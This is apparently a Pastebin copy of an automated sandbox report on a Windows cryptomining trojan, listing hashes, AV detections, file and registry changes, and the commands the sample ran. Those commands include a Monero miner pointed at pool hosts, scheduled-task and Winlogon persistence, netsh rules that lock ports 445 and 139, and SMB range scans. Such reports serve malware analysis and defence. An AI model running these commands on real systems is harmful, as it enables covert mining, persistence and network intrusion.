Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Razy"
- * MalScore: 10.0
- * File Name: "1"
- * File Size: 8994816
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "6641ecd6d39d5043325336637ed71a78c6a946172d9f6a58e99711cd3ac644a8"
- * MD5: "9026563dab83df2678253634760139ed"
- * SHA1: "d07508d96ba599fe83a57be494f8a0f11d98984c"
- * SHA512: "ede7b36be59ca41c27819c13feec621c22d74f428a371297870b6877319f8fb33b3b19e8e4d41a567dbfc1c928392720329d4ec1619073c1bbe7e462c55e3594"
- * CRC32: "E3FE5F99"
- * SSDEEP: "196608:ujAIjsLuc0gTdhq2vINJOSYFHVTxm2DDkVwCG774gc:uH9vgTvxvITAPrC4xc"
- * Process Execution:
- "1.exe",
- "fcyvsp.exe",
- "cmd.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "schtasks.exe",
- "fM.exe",
- "cmd.exe",
- "svchost.exe",
- "cmd.exe",
- "svchost.exe",
- "cmd.exe",
- "svchost.exe",
- "cmd.exe",
- "svchost.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "svchost.exe"
- * Executed Commands:
- "C:\\Windows\\nBKli\\fcyvsp.exe",
- "cmd.exe /c del \"C:\\Users\\user\\AppData\\Local\\Temp\\1.exe\"",
- "C:\\Windows\\end.bat ",
- "sc.exe Create \"Application Layre Gateway Saervice\" type= own type= interact start= demand DisplayName= \"Can not be deledted\" binPath= \"cmd.exe /c start \"C:\\Windows\\boy.exe\"",
- "C:\\Windows\\nBKli\\qdx.bat ",
- "C:\\Windows\\nBKli\\fM.exe -o stratum+tcp://monero.monerov9.com:18650 -o stratum+tcp://note.monerov9.com:7777 -o stratum+tcp://monerov9.ppxxmr.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1",
- "C:\\Windows\\nBKli\\s.bat ",
- "netsh ipsec static add policy name=ipsec_ply",
- "netsh ipsec static add filterlist name=deny_pt",
- "netsh ipsec static add filterlist name=allow_pt",
- "netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP",
- "netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP",
- "netsh ipsec static add filteraction name=deny action=block",
- "netsh ipsec static add filteraction name=allow action=negotiate",
- "netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny",
- "netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk=\"(@=P#$bV4$\"",
- "netsh ipsec static set policy name=ipsec_ply assign=y",
- "schtasks.exe /create /TN \"\\Microsoft\\Windows\\UPnP\\Services\" /RU SYSTEM /TR \"C:\\Windows\\nBKli\\fcyvsp.exe\" /SC ONSTART",
- "svchost.exe syn 192.168.0.0 192.168.255.255 445 /save",
- "svchost.exe tcp 192.168.0.0 192.168.255.255 445 700 /save",
- "svchost.exe syn 33.165.0.0 33.165.255.255 445 /save",
- "svchost.exe tcp 33.165.0.0 33.165.255.255 445 700 /save"
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details":
- "ioc": "http://ec.360bc.cnhttp"
- "ioc": "www.eyybc.com/forumdisplay.php"
- "ioc": "memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php"
- "ioc": "http://www.super-ec.cn"
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "System"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: 1.exe, pid: 2988, offset: 0x00000000, length: 0x00894000"
- "self_read": "process: fcyvsp.exe, pid: 3056, offset: 0x00000000, length: 0x00894000"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "fcyvsp.exe -> C:\\Windows\\end.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\end.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\end.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\end.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\nBKli\\qdx.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\nBKli\\fM.exe"
- "Process": "fcyvsp.exe -> C:\\Windows\\nBKli\\s.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\nBKli\\s.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\nBKli\\s.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\nBKli\\s.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\nBKli\\s.bat"
- "Process": "fcyvsp.exe -> C:\\Windows\\nBKli\\s.bat"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://www.ip138.com/ips138.asp?ip="
- "url": "http://www.ip138.com/"
- "Description": "Unconventionial language used in binary resources: Chinese (Simplified)",
- "Details":
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: \\x00 , entropy: 7.99, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x007c7000, virtual_size: 0x012a4000"
- "section": "name: jnwaxkhp, entropy: 7.54, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x000c6000, virtual_size: 0x000c6000"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Checks for the presence of known windows from debuggers and forensic tools",
- "Details":
- "Window": "OLLYDBG"
- "Window": "GBDYLLO"
- "Window": "pediy06"
- "Window": "OLLYDBG"
- "Window": "GBDYLLO"
- "Window": "pediy06"
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details":
- "Process": "netsh.exe tried to sleep 1200 seconds, actually delayed analysis time by 0 seconds"
- "Process": "fcyvsp.exe tried to sleep 2749 seconds, actually delayed analysis time by 0 seconds"
- "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "1.exe (2988) called API GetSystemTimeAsFileTime 23630 times"
- "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
- "Details":
- "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\shell"
- "data": "Explorer.exe C:\\Windows\\nBKli\\fcyvsp.exe"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load"
- "data": "C:\\Windows\\nBKli\\fcyvsp.exe"
- "task": "schtasks.exe /create /TN \"\\Microsoft\\Windows\\UPnP\\Services\" /RU SYSTEM /TR \"C:\\Windows\\nBKli\\fcyvsp.exe\" /SC ONSTART"
- "Description": "Checks for the presence of known devices from debuggers and forensic tools",
- "Details":
- "Description": "Detects the presence of Wine emulator via registry key",
- "Details":
- "Description": "File has been identified by 49 Antiviruses on VirusTotal as malicious",
- "Details":
- "Bkav": "HW32.Packed."
- "MicroWorld-eScan": "Gen:Variant.Razy.317367"
- "CAT-QuickHeal": "Trojan.Generic"
- "Qihoo-360": "Win32/Trojan.992"
- "McAfee": "Artemis!9026563DAB83"
- "Cylance": "Unsafe"
- "K7AntiVirus": "Trojan ( 004eb1bf1 )"
- "BitDefender": "Gen:Variant.Razy.317367"
- "K7GW": "Trojan ( 004eb1bf1 )"
- "Symantec": "Trojan.Gen.MBT"
- "ESET-NOD32": "a variant of Win32/Packed.Themida.AAN"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "GData": "Gen:Variant.Razy.317367"
- "Kaspersky": "HEUR:Trojan.Win32.Generic"
- "Alibaba": "Packed:Win32/Themida.9bc8e1ba"
- "AegisLab": "Trojan.Win32.Generic.4!c"
- "Avast": "Win32:Trojan-gen"
- "Tencent": "Win32.Packed.Themida.Hphm"
- "Ad-Aware": "Gen:Variant.Razy.317367"
- "Sophos": "Mal/Generic-S"
- "Comodo": "TrojWare.Win32.Urelas.X@56i79a"
- "F-Secure": "Trojan.TR/AD.EquationDrug.zvmfv"
- "DrWeb": "Trojan.DownLoader29.8646"
- "VIPRE": "Trojan.Win32.Generic!BT"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.DealPly.rc"
- "FireEye": "Generic.mg.9026563dab83df26"
- "Emsisoft": "Gen:Variant.Razy.317367 (B)"
- "SentinelOne": "DFI - Suspicious PE"
- "Cyren": "W32/Trojan.FUKE-5265"
- "Avira": "TR/AD.EquationDrug.zvmfv"
- "MAX": "malware (ai score=81)"
- "Endgame": "malicious (high confidence)"
- "Arcabit": "Trojan.Razy.D4D7B7"
- "ViRobot": "Trojan.Win32.Z.Razy.8994816"
- "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
- "Microsoft": "Trojan:Win32/Eqtonex.C"
- "AhnLab-V3": "Trojan/Win32.EquationDrug.R238981"
- "Acronis": "suspicious"
- "ALYac": "Gen:Variant.Razy.317367"
- "Malwarebytes": "Trojan.EquationDrug"
- "Rising": "Trojan.Generic!8.C3 (CLOUD)"
- "Ikarus": "Trojan.Win32.Themida"
- "Fortinet": "W32/PossibleThreat"
- "AVG": "Win32:Trojan-gen"
- "Cybereason": "malicious.dab83d"
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- "MaxSecure": "Trojan.Malware.7164915.susgen"
- "Description": "Detects VirtualBox using ACPI tricks",
- "Details":
- "Description": "Detects VirtualBox through the presence of a registry key",
- "Details":
- "Description": "Created a service that was not started",
- "Details":
- "service": "Application Layre Gateway Saervice"
- "Description": "Anomalous binary characteristics",
- "Details":
- "anomaly": "Unprintable characters found in section name"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection"
- * Started Service:
- "PolicyAgent"
- * Mutexes:
- "DBWinMutex",
- "asdas46574687fgssdf541654gdf54687sdfgdfg"
- * Modified Files:
- "\\??\\SICE",
- "\\??\\SIWVID",
- "\\??\\NTICE",
- "C:\\Windows\\nBKli\\tscl.html",
- "C:\\Windows\\IME\\tps.exe",
- "C:\\Windows\\boy.exe",
- "C:\\Windows\\nBKli\\fcyvsp.exe",
- "C:\\Windows\\end.bat",
- "C:\\Windows\\nBKli\\qdx.bat",
- "C:\\Windows\\nBKli\\chrome..exe",
- "C:\\Windows\\nBKli\\chrome..xml",
- "C:\\Windows\\nBKli\\chrome..fb",
- "C:\\Windows\\nBKli\\Cstr.exe",
- "C:\\Windows\\nBKli\\Cstr.fb",
- "C:\\Windows\\nBKli\\Cstr.xml",
- "C:\\Windows\\nBKli\\adfw.dll",
- "C:\\Windows\\nBKli\\adfw-2.dll",
- "C:\\Windows\\nBKli\\cnli-0.dll",
- "C:\\Windows\\nBKli\\cnli-1.dll",
- "C:\\Windows\\nBKli\\coli-0.dll",
- "C:\\Windows\\nBKli\\crli-0.dll",
- "C:\\Windows\\nBKli\\dmgd-1.dll",
- "C:\\Windows\\nBKli\\dmgd-4.dll",
- "C:\\Windows\\nBKli\\esco-0.dll",
- "C:\\Windows\\nBKli\\etch-0.dll",
- "C:\\Windows\\nBKli\\etchCore-0.x64.dll",
- "C:\\Windows\\nBKli\\etchCore-0.x86.dll",
- "C:\\Windows\\nBKli\\eteb-2.dll",
- "C:\\Windows\\nBKli\\etebCore-2.x64.dll",
- "C:\\Windows\\nBKli\\etebCore-2.x86.dll",
- "C:\\Windows\\nBKli\\exma.dll",
- "C:\\Windows\\nBKli\\exma-1.dll",
- "C:\\Windows\\nBKli\\iconv.dll",
- "C:\\Windows\\nBKli\\libcurl.dll",
- "C:\\Windows\\nBKli\\libeay32.dll",
- "C:\\Windows\\nBKli\\libiconv-2.dll",
- "C:\\Windows\\nBKli\\libxml2.dll",
- "C:\\Windows\\nBKli\\pcla-0.dll",
- "C:\\Windows\\nBKli\\pcre-0.dll",
- "C:\\Windows\\nBKli\\pcrecpp-0.dll",
- "C:\\Windows\\nBKli\\pcreposix-0.dll",
- "C:\\Windows\\nBKli\\posh.dll",
- "C:\\Windows\\nBKli\\posh-0.dll",
- "C:\\Windows\\nBKli\\riar.dll",
- "C:\\Windows\\nBKli\\riar-2.dll",
- "C:\\Windows\\nBKli\\ssleay32.dll",
- "C:\\Windows\\nBKli\\tibe.dll",
- "C:\\Windows\\nBKli\\tibe-1.dll",
- "C:\\Windows\\nBKli\\tibe-2.dll",
- "C:\\Windows\\nBKli\\trch.dll",
- "C:\\Windows\\nBKli\\trch-0.dll",
- "C:\\Windows\\nBKli\\trch-1.dll",
- "C:\\Windows\\nBKli\\trfo.dll",
- "C:\\Windows\\nBKli\\trfo-0.dll",
- "C:\\Windows\\nBKli\\trfo-2.dll",
- "C:\\Windows\\nBKli\\tucl.dll",
- "C:\\Windows\\nBKli\\tucl-1.dll",
- "C:\\Windows\\nBKli\\ucl.dll",
- "C:\\Windows\\nBKli\\xdvl-0.dll",
- "C:\\Windows\\nBKli\\zibe.dll",
- "C:\\Windows\\nBKli\\zlib1.dll",
- "C:\\Windows\\nBKli\\TFf",
- "C:\\Windows\\nBKli\\fM.exe",
- "C:\\Windows\\nBKli\\svchost.exe",
- "C:\\Windows\\nBKli\\s.bat",
- "\\Device\\Http\\Communication",
- "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows\\UPnP\\Services",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "C:\\Windows\\nBKli\\s1.txt",
- "C:\\Windows\\nBKli\\Result.txt"
- * Deleted Files:
- "C:\\Windows\\end.bat",
- "C:\\Windows\\nBKli\\qdx.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1.exe",
- "C:\\Windows\\nBKli\\Result.txt",
- "C:\\Windows\\nBKli\\s1.txt"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\run",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\shell",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\ipsecISAKMPReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\ipsecNegotiationPolicyReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\ipsecNFAReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\name",
